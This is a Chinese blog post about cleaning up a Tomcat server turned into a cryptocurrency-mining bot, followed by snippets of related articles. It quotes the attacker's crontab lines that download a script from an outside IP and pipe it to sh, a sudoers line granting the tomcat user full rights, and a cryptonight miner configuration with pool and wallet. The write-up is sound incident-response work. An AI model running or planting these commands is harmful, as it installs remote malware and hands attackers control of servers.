Tomcat应用服务器被黑客 肉鸡攻击 记录

最新推荐文章于 2023-04-13 09:24:56 发布
最新推荐文章于 2023-04-13 09:24:56 发布
阅读量1w 收藏 2
点赞数 1
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnhsh/article/details/95800620
版权

线上一台应用服务器报警,负载过高,这个就诡异了,因为只是一个普通的服务器,应用使用人员不到10个人,咋会负载高,肯定有问题哪,登陆上去查看,
top查看哪个占据的cpu资源比较多

[root@aew01~]# top
top - 14:27:49 up 423 days, 22:48,  3 users,  load average: 2.10, 1.85, 1.66
Tasks: 166 total,   1 running, 164 sleeping,   0 stopped,   1 zombie
Cpu0  : 45.4%us,  0.8%sy,  0.0%ni, 53.8%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  : 38.2%us,  0.8%sy,  0.0%ni, 59.8%id,  0.0%wa,  0.0%hi,  1.2%si,  0.0%st
Mem:  14389372k total, 14233284k used,   156088k free,    12388k buffers
Swap: 33554428k total,  1511980k used, 32042448k free,    40140k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                                                                                                           
39674 tomcat    20   0  223m 2808  412 S 75.0  0.0   4031:53 atd                                                                                                                                
54892 tomcat    20   0 10.1g 3.6g 4816 S  4.6 26.4 969:07.52 java  


[tomcat@aew01~]$ crontab -l
 */20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh
 */19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh
[tomcat@aew01~]$

看到有一个atd进程,这是什么鬼? 查看atd进程 
[root@aew01~]# ps -eaf|grep 39674
root     39023 37026  0 14:28 pts/0    00:00:00 grep 39674
tomcat   39674     1 85 Jul15 ?        2-19:12:05 ./atd -c bmsnxvpggm.conf -t 1
[root@aew01~]#


再查看atd执行脚本组件,看到是一个编译之后的可执行组件 
[root@aew01~]# find / -name atd
/usr/sbin/atd
/etc/sysconfig/atd
/etc/pam.d/atd
/etc/rc.d/init.d/atd
/var/tmp/atd
[root@aew01~]# more /usr/sbin/atd

******** /usr/sbin/atd: Not a text file ********

[root@aew01~]#


查看配置文件bmsnxvpggm.conf 
[root@aew01~]# more /var/tmp/bmsnxvpggm.conf
{
    "url" : "stratum+tcp://94.23.41.130:80",
    "user" : "49mQCzecsC6TS1sNBj5XQX4dNG8MESvLGLPHYJLKohVCQivAB5jJw2xHokTpjtSfE3D8m2U3JjDGEWJMYLrN216CM3dRpBt",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
[root@aew01~]#

看来是被盯上了,攻击了。kill掉进程 
[root@aew01~]# kill -9 39979
[root@aew01~]# ps -eaf|grep atd
root     40917 37026  0 14:48 pts/0    00:00:00 grep atd
[root@aew01~]#

然后负载降下来了,但是可恶的是,不到5分钟,负载又上来了,一看又是atd这个进程在运行,进去查看tomcat的crontab任务,发现已经被写进crontab任务了,于是注释掉crontab任务。 
	[tomcat@aew01~]$ crontab -l
	 */20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh
	 */19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh
	[tomcat@aew01~]$

然后又查看历史操作,有这样一个命令echo "tomcat ALL=(ALL) ALL" >> /etc/sudoers曾经被执行过 >echo "tomcat ALL=(ALL) ALL" >> /etc/sudoers >,于是,为了安全起见,进配置/etc/sudoers文件里面,注释掉 #tomcat ALL=(ALL) ALL这一行,然后重启tomcat应用程序。

彻底检查了下应用服务器所对于的db服务器,发现db没有被攻击,各种数据账号安全,又迅速修改了数据库账号密码等等。

BTY:最终的彻底的解解决方案还是需要应用开发人员,堵住tomcat的漏洞,避免黑客使用tomcat漏洞获得应用服务器的tomcat账号权限,进而登陆应用服务器,将应用服务器做成肉鸡,不停的往外发包。
服务器被攻击后处理办法
s13596191285的博客
01-06 319
安全总是相对的,再安全的服务器也有可能遭受到攻击。作为一个安全运维人员,要把握的原则是:尽量做好系统安全防护,修复所有已知的危险行为,同时,在系统遭受攻击后能够迅速有效地处理攻击行为,最大限度地降低攻击对系统产生的影响。 一、处理服务器遭受攻击的一般思路 系统遭受攻击并不可怕,可怕的是面对攻击束手无策,下面就详细介绍下在服务器遭受攻击后的一般处理思路。 1.切断网络 所有的攻击都来自于网络,因此,在得知系统正遭受黑客攻击后,首先要做的就是断开服务器的网络连接,这样除了能切断攻击源之
linux 系统命令被后门修改_一次Linux系统被攻击的分析过程
weixin_39519619的博客
11-06 813
作者:南非蚂蚁 来源:https://urlify.cn/M7NjIvIT行业发展到现在,安全问题已经变得至关重要,从之前的“棱镜门”事件中,折射出了很多安全问题,信息安全问题已变得刻不容缓,而做为运维人员,就必须了解一些安全运维准则,同时,要保护自己所负责的业务,首先要站在攻击者的角度思考问题,修补任何潜在的威胁和漏洞。下面通过一个案例介绍下当一个服务器被rootkit入侵后的处理思路...
一次tomcat服务器被入侵解决办法
weixin_34038293的博客
09-19 610
 突然tomcat目录下莫名其妙的多了几个war文件,里面内容只有一个index.jsp,打开控制台发现多了几个应用,我可以确定不是我部署上去的,顺着应用访问竟然看到了 天哪,这是个资源管理器的功能,能控制机器上所有文件操作。 还有   真是太危险了,原来tomcat这么容易被入侵   解决办法 1)马上停止tomcat   2)确定是入侵文件后马上删除或转移到其它临时目...
服务器被黑客攻击了,如何去处理?
Johncdn123的博客
08-16 1726
服务器被攻击一般有两种比较常见的方式:一是恶意的攻击行为,如拒绝服务攻击,网络病毒等等,这种方式就是消耗服务器资源,影响服务器的正常运作,甚至服务器所在网络的瘫痪;另外一个就是恶意的入侵行为,这种行为更是会导致服务器敏感信息泄露,入侵者更是可以为所欲为,肆意破坏服务器。所以我们要保证网络服务器的安全可以说就是尽量减少网络服务器受这两种行为的影响。国外服务器防黑客干扰要注意以下几个方面: 1、选用安全的口令,口令应该包括大写字母,小写字母及数字,有控制符更好 2、定期分析系统日志 3、谨慎开放缺乏安全保
天呐,我的服务器竟然也被黑客攻击了!
江南一点雨的专栏
05-11 2412
真是想不到,这种事竟然也生在我身上。大概是在 2017 年底,为了某种(大家懂)便利,松哥购买了个 VULTR 服务器,一个月也就 2.5 刀,除了日常的科学上网需求外,...
公司服务器被攻击tomcat不停的响应,日志不停的刷,iptables配置后解决
吴某某人的笔记
05-12 2805
公司用了nginx 1.进入nginx日志看到如下信息 知道是这个网址在攻击 180.168.87.114 - - [12/May/2017:17:44:44 +0800] "GET *********此处为公司的请求url********** HTTP/1.1" 502 568 "http://vip.zhasita.com/plugin.php?id=fivechess_progress
暴力破解攻击工具汇总——字典很关键,肉鸡也关键
weixin_30296405的博客
03-30 5095
lasercrack是一款爆力破解工具,ruby写的,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率。 破解RDP的软件也有很多,比如ncrack和Fast RDP Brute。 如果网页没有设置登录验证码,则很可能成为暴力破解工具攻击的目标,http://www.freebuf.com/column/169124.html,Nodejs暴力破解实践 web 登...
黑客术语基础知识快速了解
独爱米粒
04-29 8757
黑客术语基础知识快速了解 1.肉鸡:所谓“肉鸡”是一种很形象的比方,比方那些能够随意被我们操控的电脑,对方可所以WINDOWS体系,也可所以UNIX/LINUX体系,可所以一般的个人电脑,也可所以大型的服务器,我们能够象操作自己的电脑那样来操作它们,而不被对方所发觉。 2.木马:就是那些表面上伪装成了正常的程序,可是当这些被程序运转时,就会获...
web入侵二之弱口令攻击及其他
热门推荐
jiangliuzheng的专栏
12-30 1万+
一、什么是弱口令   就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果   二、共享入侵--IPC$     IPC$是共享“命名管道”资源,它是为了让进程间通信而开放的命令管道,可以通过验证用户名和密码获取相应的权限,在远程管理计算机和查看计算机的共享资源是使用,利用IPC$,攻击者甚至可
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9198
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
全国DNS服务器瘫痪或遭黑客攻击
请叫我菜鸟
01-22 1824
1、台湾地震震断海底光缆 2006年12月27日 受南海海域发生强烈地震影响,多条国际海底通信光缆发生中断,造成中国大陆至台湾地区、美国、欧洲等方向的通信线路大量中断,国际港澳台互联网访问质量受到严重影响,包括雅虎等国际网站无法访问。此外,国际港澳台话音和专线业务受到一定影响。 故障原因: 南海海域发生强烈地震影响,多条国际海底通信光缆发生中断 2、暴风DNS受攻击导致大范围断网
今天被人在用脚本攻击本地tomcat服务
qq_38844974的博客
07-16 1464
黑客在用脚本一直访问本地tomcat服务的manager,查看ip 发现是公司服务器的ip,无法使用禁止ip访问的手段。查看了日志发现其访问的地址为/manager/html  并不是本地项目名字,报的错误为an attempt was made to authenticate the locked user“admin”。百度了以后可能是黑客在强行破解manger管理页面的密码,但是因为身份验证...
黑客攻击高防服务器了怎么处理
m0_67776192的博客
04-19 398
对于黑客而言最理想的攻击方式,无疑是通过“肉鸡”的形式发起攻击。虽然不少公司都启用了高防服务器去防御攻击。但依旧还是会遇到攻击,那么黑客主要会通过哪些方式去对高防服务器发起攻击呢? 一、通过开源软件漏洞 目前在网上几乎随处可见有什么软件或者游戏的源码出售,这些软件和游戏大多是由一些技术人员一个人进行编辑后出售的。与一般比较大的专业的研发公司不一样,这些源码大多会有一些bug和漏洞,用户在使用时,这些漏洞就会存在一些安全隐患。有时候不仅仅是单纯的被黑客攻击这么简单了。 二、木马程序 黑客用过.
tomcat服务器
weixin_30670925的博客
08-04 140
一、常用的web服务器 *Tomcat:Apache的产品,它是一个开源免费的web服务器。 *JBoss(Redhat红帽):支持JavaEE,应用比较广;EJB容器 * GlassFish(Orcale):Oracle开发JavaWeb服务器,应用不是很广; * Resin(Caucho):支持JavaEE,应用越来越广; * Weblogic(Orcale):要钱的!支持...
tomcat正常运行一段时间后,tomcat异常停,进程被killed
weixin_30552635的博客
08-03 1684
tomcat异常停,进程被killed 对应tomcat日志如下: /application/tomcat-service-8080/bin/catalina.sh: line 386: 4370 Killed "/usr/local/jdk/bin/java" "-Djava.util.logging.config.file=/application/tomcat-service-8080/...
疑似tomcat服务器的8009端口攻击
baken99的专栏
04-22 1700
前一天晚上测试到凌晨2点,今天下午打开tomcat服务器突然发现服务器上报了一串异常,截图如下:提示显示显示早上7点27分的时候,有人访问了我的服务器,并留下了一些异常信息。可是这个在百度云的服务器,申请开通后3天,就出现过一次被攻击的迹象,当时具体的提示忘记了,但是听网上说解决方法是把tomcat安装默认的页面删除,删除后确实没有再遇到那种异常了。服务器IP刚刚备案成功两天,又遇到这种奇怪情况,...
Tomcat 漏洞总结
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
10-09 9826
CVE-2017-12615 漏洞原理 CVE-2017-12615由于配置不当,可导致任意文件上传,影响版本:Tomcat7.0.0-7.0.81 由于配置不当,conf/web.xml中的readonly设置为flase,可导致用PUT方法上传任意文件,但限制了jsp后缀的上传 漏洞复现 使用Vulhub搭建测试环境 Vulhub - Docker-Compose file for vulnerability environment 成功启动环境 进入容器,并查看配置文件,发现r
WindowsTomcat 服务日志分析
最新发布
难办就别办的博客
04-13 5271
打开 C:\ProgramFiles\ApacheSoftwareFoundation\Tomcat5.5\logs 文件夹,可以看到在该文件 夹下有多个日志文件。可通过文件logging.propertie(于C:\ProgramFiles\ApacheSoftwareFoundation\Tomcat5.5\conf) 对以上这些日志的特性进行配置。
Tomcat应用服务器详解:安装与目录结构
"应用服务器的介绍,主要讲解了Tomcat的简介、安装步骤、目录结构以及如何部署和运行Web应用程序。" 在IT行业中,应用服务器是一种用于托管和执行企业级应用程序的软件平台。这些应用程序通常基于Java Servlet和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值